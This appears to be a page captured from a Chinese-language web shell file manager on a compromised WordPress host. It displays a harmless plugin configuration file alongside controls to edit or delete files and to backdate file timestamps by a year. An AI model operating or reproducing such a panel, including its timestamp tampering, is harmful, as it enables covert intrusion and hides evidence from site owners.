文件操作 - html.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/vec.uaysen.cl/html/wp-content/plugins/us-core/config/elements/html.php
编辑文件内容
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * Configuration for shortcode: html */ $design_options_params = us_config( 'elements_design_options' ); $hover_options_params = us_config( 'elements_hover_options' ); /** * @return array */ return array( 'title' => __( 'Custom HTML', 'us' ), 'icon' => 'fas fa-code', 'params' => us_set_params_weight( // General section array( 'content' => array( 'description' => sprintf( __( 'Added content will be displayed inside the %s block', 'us' ), '<code><div class="w-html"></div></code>' ), 'type' => 'html', 'encoded' => TRUE, 'std' => base64_encode( '<p>I am raw html block.<br/>Click edit button to change this html</p>' ), 'usb_preview' => TRUE, ), ), $design_options_params, $hover_options_params ), );
修改文件时间
将文件时间修改为当前时间的前一年
删除文件